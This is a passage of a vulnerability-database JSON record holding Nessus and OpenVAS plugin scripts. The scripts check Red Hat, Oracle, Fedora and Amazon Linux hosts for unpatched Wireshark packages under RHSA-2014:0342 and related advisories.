(RHSA-2014:0342)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0342. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73282);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:38\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504, 64411, 64412, 66066, 66068, 66072);\n script_xref(name:\"RHSA\", value:\"2014:0342\");\n\n script_name(english:\"RHEL 6 : wireshark (RHSA-2014:0342)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-2299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-7112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-2281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-6339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-6338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-6337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-6336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-7114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-6340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-2283\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark wiretap/mpeg.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0342\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-1.8.10-7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-debuginfo-1.8.10-7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-devel-1.8.10-7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"wireshark-gnome-1.8.10-7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"wireshark-gnome-1.8.10-7.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"wireshark-gnome-1.8.10-7.el6_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel / wireshark-gnome\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-27T10:48:30", "bulletinFamily": "scanner", "description": "Check for the Version of wireshark", "modified": "2017-07-12T00:00:00", "published": "2014-04-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=871149", "id": "OPENVAS:871149", "title": "RedHat Update for wireshark RHSA-2014:0342-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2014:0342-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(871149);\n script_version(\"$Revision: 6688 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:49:31 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-03 13:06:12 +0530 (Thu, 03 Apr 2014)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\",\n \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for wireshark RHSA-2014:0342-01\");\n\n tag_insight = \"Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n\";\n\n tag_affected = \"wireshark on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"RHSA\", value: \"2014:0342-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2014-March/msg00039.html\");\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-0342", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123434", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123434", "title": "Oracle Linux Local Check: ELSA-2014-0342", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0342.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123434\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:45 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0342\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0342 - wireshark security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0342\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0342.html\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.8.10~7.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.8.10~7.0.1.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:08:36", "bulletinFamily": "scanner", "description": "Check for the Version of wireshark", "modified": "2018-01-18T00:00:00", "published": "2013-11-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867039", "id": "OPENVAS:867039", "title": "Fedora Update for wireshark FEDORA-2013-20829", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-20829\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867039);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:28:58 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-20829\");\n\n tag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\nThis package lays base for libpcap, a packet capture and filtering\nlibrary, contains command-line utilities, contains plugins and\ndocumentation for wireshark. A graphical user interface is packaged\nseparately to GTK+ package.\n\";\n\n tag_affected = \"wireshark on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-20829\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-November/120218.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.3~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-18T00:00:00", "id": "OPENVAS:1361412562310867053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867053", "title": "Fedora Update for wireshark FEDORA-2013-20985", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-20985\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867053\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-18 11:12:41 +0530 (Mon, 18 Nov 2013)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-20985\");\n\n\n script_tag(name:\"affected\", value:\"wireshark on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-20985\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-November/121307.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.3~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-19T15:08:39", "bulletinFamily": "scanner", "description": "Check for the Version of wireshark", "modified": "2018-01-19T00:00:00", "published": "2013-11-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867053", "id": "OPENVAS:867053", "title": "Fedora Update for wireshark FEDORA-2013-20985", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-20985\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867053);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-18 11:12:41 +0530 (Mon, 18 Nov 2013)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-20985\");\n\n tag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\nThis package lays base for libpcap, a packet capture and filtering\nlibrary, contains command-line utilities, contains plugins and\ndocumentation for wireshark. A graphical user interface is packaged\nseparately to GTK+ package.\n\";\n\n tag_affected = \"wireshark on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-20985\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-November/121307.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.3~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120046", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120046", "title": "Amazon Linux: Security Advisory (ALAS-2014-330)", "type": "openvas", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120046\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:12 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-330)\");\n script_tag(name:\"insight\", value:\"Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2014-2281, CVE-2014-2299 )Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114 )\");\n script_tag(name:\"solution\", value:\"Run yum update wireshark to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-330.html\");\n script_cve_id(\"CVE-2013-6339\", \"CVE-2013-6338\", 